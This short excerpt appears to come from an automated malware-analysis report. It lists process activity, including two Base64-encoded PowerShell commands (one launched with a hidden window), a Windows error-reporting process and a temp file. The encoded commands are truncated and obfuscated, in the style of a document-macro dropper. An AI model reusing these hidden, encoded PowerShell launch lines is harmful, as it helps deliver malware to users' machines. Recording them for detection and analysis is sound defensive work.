Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\1201925.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...' (with a hidden window)